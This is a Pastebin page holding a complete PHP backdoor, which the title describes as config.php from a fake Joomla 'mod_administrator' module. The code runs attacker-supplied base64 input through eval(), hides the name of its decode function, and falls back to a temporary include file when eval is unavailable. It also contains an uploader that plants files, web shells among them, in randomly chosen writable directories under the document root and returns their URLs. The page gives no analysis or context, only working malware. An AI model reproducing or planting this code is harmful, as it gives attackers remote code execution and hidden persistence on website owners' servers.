SHARE
TWEET

config.php in mod_administrator fake joomla module

scurit Jan 10th, 2014 178 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--FILE IS NULL OR EMPTY-->
  2. <?php
  3.  
  4. $version = "1.5";
  5. if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
  6.  $isevalfunctionavailable = false;
  7.  $evalcheck = "\$isevalfunctionavailable = true;";
  8.  @eval($evalcheck);
  9.  if ($isevalfunctionavailable === true) {
  10.     $fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
  11.    
  12.     $fv = $fnsdht($_POST["gjwqweodsa"]);
  13.     @eval($fv);
  14.     //@eval($_POST["gjwqweodsa"]);
  15.  }else{
  16.     $mpath =  realpath("")."/";
  17.     //$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
  18.     if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
  19.         @include_once($mpath."dsadasdsa1fag1.php");
  20.         @unlink($mpath."dsadasdsa1fag1.php");
  21.     }else{
  22.         echo "ERROR! CANT DO NOTHING!";
  23.     }
  24.  }
  25. }
  26. //if (is_uploaded_file($_FILES['file']['tmp_name']))
  27. if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
  28. {
  29.   $fname = trim($_POST['fname']);
  30.   $save_type = trim($_POST['save_type']);
  31.   $dirname = trim($_POST['dirname']);
  32.   $namecrt = trim($_POST['namecrt']);
  33.  
  34.   $auth_pass = trim($_POST['auth_pass']);
  35.   $change_pass = trim($_POST['change_pass']);
  36.  
  37.   $file_type = trim($_POST['file_type']);
  38.   $ftdata = trim($_POST['ftdata']);
  39.   $is_sh = trim($_POST['is_sh']);
  40.  
  41.   if($namecrt == "random"){
  42.     $fname = make_name($fname);
  43.   }
  44.   $uploadfile = "";
  45.  
  46.   if($save_type == "same_dir"){
  47.     $uploadfile = realpath("")."/". $fname;
  48.   }else if($save_type == "sub_dir"){
  49.     $uploadfile = realpath("")."/$dirname/". $fname;
  50.     if(!@mkdir(realpath("")."/$dirname/", 0755)){
  51.         $uploadfile = realpath("")."/". $fname;
  52.     }
  53.   }else if($save_type == "root"){
  54.     $root = $_SERVER['DOCUMENT_ROOT']."/";
  55.     if(@is_writable($root)){
  56.         $uploadfile = $root.$fname;
  57.     }else{
  58.         $uploadfile = realpath("")."/". $fname;
  59.     }
  60.   }else if($save_type == "root_in_dir"){
  61.     $root = $_SERVER['DOCUMENT_ROOT']."/";
  62.     $uploadfile = $root."$dirname/". $fname;
  63.     if(!@mkdir($root."$dirname/", 0755)){
  64.         $uploadfile = realpath("")."/". $fname;
  65.     }
  66.   }else if($save_type == "random_dir"){
  67.     $uploadfile = choose_dir();
  68.     if(@is_writable($uploadfile)){
  69.         $uploadfile = $uploadfile.$fname;
  70.     }else{
  71.         $uploadfile = realpath("")."/". $fname;
  72.     }
  73.   }else if($save_type == "random_dir_random_dirname"){
  74.     $dirs = array("dwr","temp","htdata","docs","memory","limits_data","module_config","temp_memory");
  75.     $dr = $dirs[array_rand($dirs)];
  76.    
  77.     $chodir =  choose_dir();
  78.     $uploadfile = $chodir.$dr."/".$fname;
  79.    
  80.     if(!@mkdir($chodir."$dr/", 0755)){
  81.         $uploadfile = realpath("")."/". $fname;
  82.     }
  83.   }else{
  84.     $uploadfile = realpath("")."/". $fname;
  85.   }
  86.   if($file_type == "file"){
  87.      if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
  88.       {
  89.         if($is_sh == "1" or $is_sh == 1){
  90.             if($change_pass == "1" or $change_pass == 1){  
  91.            
  92.             }else{
  93.                 $auth_pass = "";
  94.             }
  95.             $d = @file_get_contents($uploadfile);
  96.             $d = str_replace("{||AUTH_PASS||}",$auth_pass,$d);
  97.             @file_put_contents($uploadfile,$d);
  98.         }
  99.         $url = "http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile);
  100.         echo "UPLOAD:".$url."-END";
  101.       }
  102.       else
  103.       {
  104.             echo "ERROR upload";
  105.       }
  106.   }else{
  107.     if($is_sh == "1" or $is_sh == 1){
  108.             if($change_pass == "1" or $change_pass == 1){  
  109.            
  110.             }else{
  111.                 $auth_pass = "";
  112.             }
  113.             $ftdata = base64_decode($ftdata);
  114.             $ftdata = str_replace("{||AUTH_PASS||}",$auth_pass,$ftdata);
  115.     }
  116.     if(@file_put_contents($uploadfile,$ftdata)){
  117.         @chmod($uploadfile,0644);
  118.         echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
  119.     }else{
  120.         $fp = fopen($uploadfile, "w");
  121.         if($fp === false){
  122.                 echo "ERROR upload";
  123.         }else{
  124.                 @fputs ($fp, $ftdata);
  125.                 @fclose ($fp);
  126.                 @chmod($uploadfile,0644);
  127.                 echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
  128.         }
  129.     }
  130.   }
  131.      
  132. }
  133.  
  134. function make_name($curname){
  135.     $l = array("_","__","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","1","2","3","4","5","6","7","8","9","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
  136.     $leng = rand(3, 9);
  137.     $ret = "";
  138.     for($i = 0; $i < $leng; $i++){
  139.         $ret .= $l[array_rand($l)];
  140.     }
  141.     $curname = explode(".",$curname);
  142.     return $ret.".".$curname[1];
  143. }
  144.  
  145. function choose_dir(){
  146.     $lim = 0;
  147.     $res_dirs = array_unique(my_scan($_SERVER['DOCUMENT_ROOT']."/",$lim));
  148.     $t = array();
  149.     for($j = 0; $j < count($res_dirs); $j++){
  150.         $ct = explode("/",$res_dirs[$j]);
  151.         $t[] = count($ct);
  152.     }
  153.     arsort($t);
  154.     $cpath = "";
  155.     $wrt_dirs = array();
  156.     foreach($t as $key=>$val){
  157.         if(@is_writable($res_dirs[$key])){
  158.            if(@file_put_contents($res_dirs[$key]."t.php","hello")){
  159.               @unlink($res_dirs[$key]."t.php");
  160.               //$cpath =  $res_dirs[$key];
  161.               //break;
  162.               $wrt_dirs[] = $res_dirs[$key];
  163.            }
  164.         }
  165.     }
  166.     if(!empty($wrt_dirs) and count($wrt_dirs)>1){
  167.         $cpath = $wrt_dirs[array_rand($wrt_dirs)];
  168.     }
  169.     if(empty($cpath) or $cpath == "" or strlen($cpath) == 0){
  170.        $cpath = $_SERVER['DOCUMENT_ROOT']."/";
  171.     }
  172.     return $cpath;
  173. }
  174.  
  175. function my_scan($startDir,&$lim){
  176.     $cur_dir = @scandir($startDir);
  177.     $res = array();
  178.     for($ii = count($cur_dir)-1; $ii >=0; $ii--){
  179.         $one_dir = $cur_dir[$ii];
  180.         @set_time_limit(0);
  181.         if($lim > 100)break;
  182.         $d = $startDir.$one_dir;
  183.         if(!@is_link($d) and @is_dir($d."/") && $one_dir !== "." && $one_dir !== ".." && $one_dir !== "cgi-bin" && $one_dir !== "webstats" && $one_dir !== "uploads" && $one_dir !== "upload" && $one_dir !== "js" && $one_dir !== "img" && $one_dir !== "images" && $one_dir !== "templates" && $one_dir !== "webstat" && strpos($one_dir,"backup")===false){
  184.             if(@is_readable($d."/")){
  185.                 $res[] = $d."/";
  186.                 $res = array_merge($res,my_scan($d."/",$lim));
  187.             }  
  188.         }
  189.         $lim++;
  190.     }
  191.     return $res;
  192. }
  193. ?>
RAW Paste Data
Top